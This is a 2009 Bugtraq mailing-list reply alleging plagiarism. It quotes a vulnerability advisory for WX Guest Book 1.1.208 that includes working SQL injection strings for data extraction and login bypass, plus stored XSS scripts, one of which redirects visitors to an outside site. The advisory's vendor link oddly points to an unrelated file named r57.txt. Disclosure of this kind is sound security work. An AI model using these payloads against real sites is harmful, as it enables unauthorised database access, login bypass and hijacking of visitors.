Re: WX Guest Book 1.1.208 (SQL/XSS) Multiple Remote Vulnerabilities

[Packet Storm <bugtraq@xxxxxxxxxxxxxxxxxxxxxxx>]

Completely stolen/copied.

http://packetstormsecurity.org/0909-exploits/wxguestbook-sqlxss.txt 
29598ed23c2831346a48aeb6fbdb3605 WX Guest Book version 1.1.208 suffers from 
remote SQL injection and cross site scripting vulnerabilities. Authored By <a 
href="mailto:damagicalhacker[at]gmail.com";>learn3r</a>


On Sun, Dec 13, 2009 at 12:45:17PM -0000, admin@xxxxxxxxxx wrote:
> ###########################################
> #     WX Guest Book 1.1.208 Vulns       #
> #     By xxHackerXzX hacker from nepal          #
> #     admin@xxxxxxxxxxx         #
> ###########################################
> 
> Product name: WX Guestbook 1.1.208
> Product vendor: http://www.ekin0x.com/r57.txt
> 
> This product suffers from multiple SQLi and persistent XSS vuln.
> 
> ##############  SQL Search Vuln  ###############
> 
> The search parameters/queries we submit to the search.php are unsanitized and 
> hence this can be compromised to SQLinject the server.
> 
> SQL query:
> $signs = DB_Execute("SELECT * FROM `wxgb_signs` WHERE (`sign` LIKE '%" . 
> $QUERY . "%') ORDER BY `code` DESC");
> 
> The $QUERY is what we submit through search box so injecting this will sql 
> inject the server.
> The following is the sample sql injection example.
> 
> 
> Sample search string: test%') UNION ALL SELECT 
> 1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/*
> 
> ##############  SQL login bypass  ###############
> The username and password fields are unsanitized and hence we can bypass the 
> login systems.
> 
> Username: admin'))/*
> Password: learn3r  [or whatever]
> 
> Or
> 
> Username: ')) or 1=1/*
> Password: learn3r  [or whatever]
> 
> ##############  Persistent XSS Vulns  ##############
> 
> In the name field (I suppose as I don't understand arabic), you can inject 
> XSS...
> <script>alert(String.fromCharCode(97));</script>
> <script>location.replace("http://www.ekin0x.com";)</script>